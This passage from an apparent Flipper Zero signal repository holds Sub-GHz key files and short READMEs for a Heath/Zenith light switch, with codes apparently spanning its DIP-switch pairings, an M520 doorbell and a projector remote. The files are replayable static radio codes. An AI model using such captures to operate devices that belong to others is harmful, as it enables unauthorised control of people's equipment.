-758 63 -462 65 -330 67 -1996 165 -330 67 -564 67 -560 131 -168 99 -1160 131 -1066 65 -598 65 -830 97 -434 65 -1586 65 -1000 133 -2092 99 -1362 133 -234 97 -2004 65 -1852 165 -330 99 -968 131 -366 99 -7464 65 -1560 131 -596 97 -132 97 -1182 65 -1692 165 -300 99 -364 97 -928 99 -3902 165 -1554 65 -9072 99 -2056 129 -3126 67 -232 165 -6874 65 -528 65 -632 67 -694 99 -1560 65 -698 133 -930 67 -1030 65 -398 133 -1030 163 -1294 65 -1092 65 -1060 131 -462 97 -526 195 -196 65 -362 97 -98 95 -824 131 -1050 65 -494 65 -264 163 -132 97 -592 65 -496 97 -198 131 -4370 97 -2636 63 -690 65 -2906 99 -496 99 -426 65 -198 65 -1544 63 -1678 163 -4422 97 -164 65 -3522 163 -824 65 -1352 131 -1084 65 -3606 99 -630 163 -2386 65 -688 99 -560 63 -7536 97 -266 261 -328 99 -2374 65 -594 65 -658 65 -3232 97 -3044 99 -632 65 -398 99 -734 97 -1432 65 -134 99 -432 99 -268 99 -1056 65 -3770 131 -46950 65 -1034 65 -2056 131 -2256 133 -464 199 -1492 65 -2746 65 -2344 97 -434 67 -566 99 -3616 99 -2676 263 -2340 65 -234 65 -3386 97 -4844 165 -1332 165 -901622 165 -1416 65 -4812 131 -504 233 -1294 99 -266 65 -400 133 -166 65 -1028 131 -832 65 -364 67 -734 97 -302 97 -528 97 -166 99 -730 67 -166 65 -1782 197 -396 131 -2932 65 -1278 65 -426 195 -4104 131 -830 133 -8628 65 -6362 131 -800 65 -730 99 -134 229 -3430 99 -700 65 -4394 99 -166 65 -1926 131 -1224 65 -6170 167 -668 67 -2352 99 -200 131 -4358 67 -132 67 -2058 65 -2912 65 -1958 97 -23584 97 -6148 163 -556 131 -600 99 -1754 229 -430 65 -168 99 -1888 231 -2020 67 -4002 99 -1294 99 -4442 65 -1054 131 -3518 163 -1476 167 -7162 99 -98 133 -932 167 -1656 99 -100 99 -666 99 -890 99 -826 97 -1082 65 -862 99 -1296 197 -2480 131 -500 231 -66 67 -2190 99 -998 67 -1164 131 -266 65 -100 99 -132 361 -564 99 -266 65 -732 199 -332 265 -3650 67 -5672 65 -2526 65 -366 65 -302 67 -1460 99 -854 63 -1444 97 -622 97 -1052 65 -4432 97 -1718 65 -2690 65 -732 131 -1512 65 -66 65 -5588 201 -1126 131 -7824 197 -628 99 -1164 133 -7052 165 -770 165 -1328 65 -4942 97 -1662 99 -1262 99 -166 99 -1722 133 -1264 131 -430 99 -926 65 -6252 65 -5426 65 -2464 65 -1946 97 -3546 99 -622 99 -1084 65 -164 65 -2092 163 -330 65 -2860 97 -6672 133 -166 99 -2588 65 -730 65 -1264 97 -4908 261 -2356 67 -98 199 7 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/100.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 00 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/101.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 01 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/102.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 02 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/110.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 10 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/111.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 11 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/112.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 12 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/120.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 20 8 | TE: 322 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/121.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 21 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/122.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 22 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/130.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 30 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/131.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 31 8 | TE: 318 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/132.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 32 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/140.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 40 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/141.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 41 8 | TE: 319 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/142.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 42 8 | TE: 318 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/150.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 50 8 | TE: 321 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/151.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 51 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/152.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 52 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/160.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 60 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/161.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 61 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/162.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 62 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/170.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 70 8 | TE: 322 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/171.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 71 8 | TE: 321 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/172.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 72 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/180.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 80 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/181.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 81 8 | TE: 319 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/182.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 82 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/190.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 90 8 | TE: 319 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/191.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 91 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/192.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 92 8 | TE: 319 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1A0.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 A0 8 | TE: 322 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1A1.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 A1 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1A2.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 A2 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1B0.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 B0 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1B1.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 B1 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1B2.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 B2 8 | TE: 321 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1C0.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 C0 8 | TE: 321 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1C1.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 C1 8 | TE: 319 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1C2.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 C2 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1D0.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 D0 8 | TE: 321 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1D1.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 D1 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1D2.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 D2 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1E0.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 E0 8 | TE: 322 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1E1.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 E1 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1E2.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 E2 8 | TE: 321 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1F0.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 F0 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1F1.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 F1 8 | TE: 321 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/1F2.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 01 F2 8 | TE: 320 9 | -------------------------------------------------------------------------------- /subghz/Heath_Zenith_Light_Switch/README.md: -------------------------------------------------------------------------------- 1 | Full capture of Heath/Zenith remote light switch. 2 | 3 | This system operates on a Holtek_HT12X 12 bit static code on 315Mhz 4 | 5 | The options for the light are: 6 | Dim (ends with 2) 7 | On (ends with 1) 8 | Off (ends with 0) 9 | 10 | The remote and the receiver are paired using DIP switches. As it turns out, the number 4 DIP switch is ignored. For example, DIP 1110 is the same as DIP 1111. 11 | 12 | The sub files are named by the value that is transmitted. 13 | -------------------------------------------------------------------------------- /subghz/M520_Wireless_Doorbell_Receiver/README.md: -------------------------------------------------------------------------------- 1 | These are two captures of M520 Wireless Doorbell Receivers. 2 | -------------------------------------------------------------------------------- /subghz/M520_Wireless_Doorbell_Receiver/doorbell_438022.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 43 80 22 8 | TE: 303 9 | -------------------------------------------------------------------------------- /subghz/M520_Wireless_Doorbell_Receiver/doorbell_47B132.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 47 B1 32 8 | TE: 302 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/1hour.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 16 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/30min.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 15 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/3hour.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 17 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/5hour.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 18 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Auto_mode.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 0E 8 | TE: 405 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Brightness_down.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 13 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Brightness_up.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 14 8 | TE: 405 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Color_mode_down.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 11 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Color_mode_up.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 12 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Flash_mode.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 10 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Music_back.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 04 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Music_forward.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 06 8 | TE: 405 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Music_off.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 03 8 | TE: 405 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Music_on.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 01 8 | TE: 406 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Music_play_pause.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 05 8 | TE: 405 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Mute.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 08 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Play_mode.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 02 8 | TE: 405 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Projector_off.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 0C 8 | TE: 403 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Projector_on.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 0A 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/README.md: -------------------------------------------------------------------------------- 1 | A complete capture of the generic remote signals for a Planet Projector 2 | 3 | Protocol: Princeton 24bit 433.92 AM (actually it's more like 433.88 or so) 4 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Sleep_mode.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 